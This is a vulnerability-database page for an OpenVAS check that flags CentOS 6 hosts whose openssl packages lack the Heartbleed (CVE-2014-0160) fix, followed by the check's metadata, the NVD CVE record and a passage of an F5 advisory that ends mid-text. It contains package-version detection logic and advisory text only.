ID OPENVAS:1361412562310881918 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the 'openssl' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for openssl CESA-2014:0376 centos6
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
  # --- Identity and revision bookkeeping ---------------------------------
  script_oid("1.3.6.1.4.1.25623.1.0.881918");
  script_version("$Revision: 14222 $");
  script_name("CentOS Update for openssl CESA-2014:0376 centos6");
  script_tag(name:"creation_date", value:"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $");

  # --- Vulnerability references -------------------------------------------
  script_cve_id("CVE-2014-0160");
  script_xref(name:"CESA", value:"2014:0376");
  script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html");

  # --- Severity ------------------------------------------------------------
  # The vector uses CVSS v2 notation (Au:, C:P). It rates confidentiality
  # impact as partial, while the insight text below notes that the leaked
  # memory may include private keys, so triage on what the host protects
  # rather than on the 5.0 alone.
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");

  # --- Human-readable result text -----------------------------------------
  # The multi-line literals are kept at column 0: any indentation inside the
  # quotes would become part of the reported text.
  script_tag(name:"summary", value:"The remote host is missing an update for the 'openssl'
package(s) announced via the referenced advisory.");
  script_tag(name:"affected", value:"openssl on CentOS 6");
  script_tag(name:"insight", value:"OpenSSL is a toolkit that implements the Secure Sockets Layer
(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a
full-strength, general purpose cryptography library.
An information disclosure flaw was found in the way OpenSSL handled TLS and
DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server
could send a specially crafted TLS or DTLS Heartbeat packet to disclose a
limited portion of memory per request from a connected client or server.
Note that the disclosed portions of memory could potentially include
sensitive information such as private keys. (CVE-2014-0160)
Red Hat would like to thank the OpenSSL project for reporting this issue.
Upstream acknowledges Neel Mehta of Google Security as the original
reporter.
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. For the update to take
effect, all services linked to the OpenSSL library (such as httpd and other
SSL-enabled services) must be restarted or the system rebooted.");
  script_tag(name:"solution", value:"Please install the updated packages.");
  script_tag(name:"solution_type", value:"VendorFix");

  # "package" quality-of-detection: the verdict is derived from the installed
  # package version rather than from probing a running TLS service.
  script_tag(name:"qod_type", value:"package");

  # --- Scheduling ----------------------------------------------------------
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("CentOS Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  # The check only runs when these knowledge-base keys are present; they are
  # presumably set by gather-package-list.nasl after an SSH login -- confirm.
  script_mandatory_keys("ssh/login/centos", "ssh/login/rpms", re:"ssh/login/release=CentOS6");

  # Description mode registers metadata only; leave before the check logic.
  exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
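# Package-version check for CESA-2014:0376 (CVE-2014-0160) on CentOS 6.
#
# Every openssl sub-package is compared against the fixed build and all
# findings are collected into a single report. Stopping at the first match
# would hide other outdated sub-packages from whoever remediates the host.
#
# Caveat: this only inspects the installed RPM versions. The advisory text
# states that services linked against OpenSSL must be restarted (or the
# system rebooted) for the update to take effect, so a clean result here does
# not show that running processes already use the patched library.

# rpm_get_ssh_release() and isrpmvuln() are not defined in this file; they are
# presumably provided by the include files pulled in above -- confirm.
release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";
report = "";

if(release == "CentOS6")
{
  # A non-NULL result from isrpmvuln() is treated as a finding and its text is
  # appended to the report (presumably returned when the installed build is
  # older than the one named in rpm: -- confirm against pkg-lib-rpm.inc).
  if ((res = isrpmvuln(pkg:"openssl", rpm:"openssl~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
    report += res;

  if ((res = isrpmvuln(pkg:"openssl-devel", rpm:"openssl-devel~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
    report += res;

  if ((res = isrpmvuln(pkg:"openssl-perl", rpm:"openssl-perl~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
    report += res;

  if ((res = isrpmvuln(pkg:"openssl-static", rpm:"openssl-static~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
    report += res;

  # One consolidated message listing every outdated sub-package.
  if (report != "")
  {
    security_message(data:report);
    exit(0);
  }

  # __pkg_match is set outside this file; exit(99) presumably tells the
  # scanner that a listed package was found and is not vulnerable -- confirm.
  if (__pkg_match) exit(99);
  exit(0);
}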
{"id": "OPENVAS:1361412562310881918", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for openssl CESA-2014:0376 centos6", "description": "The remote host is missing an update for the ", "published": "2014-04-08T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881918", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["2014:0376", "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html"], "cvelist": ["CVE-2014-0160"], "lastseen": "2019-05-29T18:37:44", "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0160", "CVE-2014-0376"]}, {"type": "f5", "idList": ["SOL15159", "F5:K15159"]}, {"type": "attackerkb", "idList": ["AKB:D165638B-97C5-4C99-BFA0-70576DB52324"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"]}, {"type": "kitploit", "idList": ["KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733", "KITPLOIT:8800200070735873517"]}, {"type": "citrix", "idList": ["CTX140605"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30475", "SECURITYVULNS:DOC:30508", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30522", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30476", "SECURITYVULNS:DOC:30479", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30509", "SECURITYVULNS:DOC:30526"]}, {"type": "hackerone", "idList": ["H1:6626", "H1:6475", "H1:44294", "H1:32570"]}, {"type": "nmap", "idList": ["NMAP:SSL-HEARTBLEED.NSE"]}, {"type": "seebug", "idList": ["SSV:62199", "SSV:86061", "SSV:62244", "SSV:62192", "SSV:62186", "SSV:62245", "SSV:86019", "SSV:62239", "SSV:62197", "SSV:62181"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1254"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "EXPLOITPACK:1020403320036D688D074B47660E9F50", 
"EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A"]}, {"type": "thn", "idList": ["THN:4868B616BCBA555DA2446F6F0EA837B0", "THN:3E9A13AAEA7FDC38D7BD8A148F19663D", "THN:0F7112302CBABF46D19CACCCFA6103C5"]}, {"type": "zdt", "idList": ["1337DAY-ID-22122", "1337DAY-ID-22129", "1337DAY-ID-22118"]}, {"type": "nessus", "idList": ["BLUECOAT_PROXY_AV_3_5_1_9.NASL", "MCAFEE_WEB_GATEWAY_SB10071.NASL", "SL_20140408_OPENSSL_ON_SL6_X.NASL", "REDHAT-RHSA-2014-0378.NASL", "FEDORA_2014-5337.NASL", "STUNNEL_5_01.NASL", "FEDORA_2014-4999.NASL", "ORACLELINUX_ELSA-2014-0376.NASL", "OPENSUSE-2014-318.NASL", "BLACKBERRY_ES_UDS_KB35882.NASL"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140417-HEARTBLEED"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105040", "OPENVAS:871154", "OPENVAS:881918", "OPENVAS:1361412562310105010", "OPENVAS:1361412562310123430"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2896-1:7AEC1"]}, {"type": "symantec", "idList": ["SMNTC-1364"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151177", "PACKETSTORM:126072", "PACKETSTORM:126288", "PACKETSTORM:126101"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRACLOUD-38927"]}, {"type": "ics", "idList": ["ICSA-14-128-01", "ICSA-14-135-04", "ICSA-14-114-01"]}, {"type": "threatpost", "idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294"]}, {"type": "redhat", "idList": ["RHSA-2014:0396", "RHSA-2014:0376"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0492-1"]}, {"type": "hp", "idList": ["HP:C04262670"]}, {"type": "cisco", "idList": ["CISCO-SA-20140408-CVE-2014-0160"]}, {"type": "freebsd", "idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978"]}, {"type": "cert", "idList": ["VU:720951"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0376"]}], "modified": "2019-05-29T18:37:44", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2019-05-29T18:37:44", "rev": 2}, "vulnersScore": 5.9}, 
"pluginID": "1361412562310881918", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881918\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6\");\n\n script_tag(name:\"affected\", value:\"openssl on CentOS 6\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way 
OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0376\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:58:19", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-07T22:55:00", "title": "CVE-2014-0160", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2020-07-28T17:11:00", "cpe": ["cpe:/a:mitel:micollab:7.2", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:mitel:mivoice:1.1.2.5", "cpe:/o:siemens:simatic_s7-1500_firmware:1.5", "cpe:/o:intellian:v100_firmware:1.21", "cpe:/a:mitel:mivoice:1.1.3.3", "cpe:/o:fedoraproject:fedora:19", "cpe:/o:redhat:enterprise_linux_server_eus:6.5", "cpe:/a:mitel:micollab:7.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:redhat:virtualization:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:redhat:gluster_storage:2.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:siemens:simatic_s7-1500t_firmware:1.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:intellian:v100_firmware:1.20", "cpe:/a:mitel:mivoice:1.4.0.102", "cpe:/a:mitel:mivoice:1.3.2.2", "cpe:/o:siemens:application_processing_engine_firmware:2.0", "cpe:/a:siemens:wincc_open_architecture:3.12", "cpe:/a:mitel:mivoice:1.2.0.11", "cpe:/o:siemens:cp_1543-1_firmware:1.1", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:fedoraproject:fedora:20", "cpe:/o:intellian:v100_firmware:1.24", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/a:mitel:micollab:7.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_tus:6.5", "cpe:/a:mitel:micollab:6.0", "cpe:/a:mitel:micollab:7.1", "cpe:/o:intellian:v60_firmware:1.15", "cpe:/a:redhat:storage:2.1", "cpe:/a:mitel:micollab:7.3.0.104", "cpe:/o:intellian:v60_firmware:1.25", "cpe:/o:opensuse:opensuse:12.3"], "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:a:redhat:virtualization:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.20:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:application_processing_engine_firmware:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.2.0.11:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.3.2.2:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.2.5:*:*:*:*:lync:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3.0.104:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.4.0.102:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:gluster_storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:wincc_open_architecture:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:cp_1543-1_firmware:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.3.3:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.25:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500t_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.24:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d 
\nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 
7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. 
If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. 
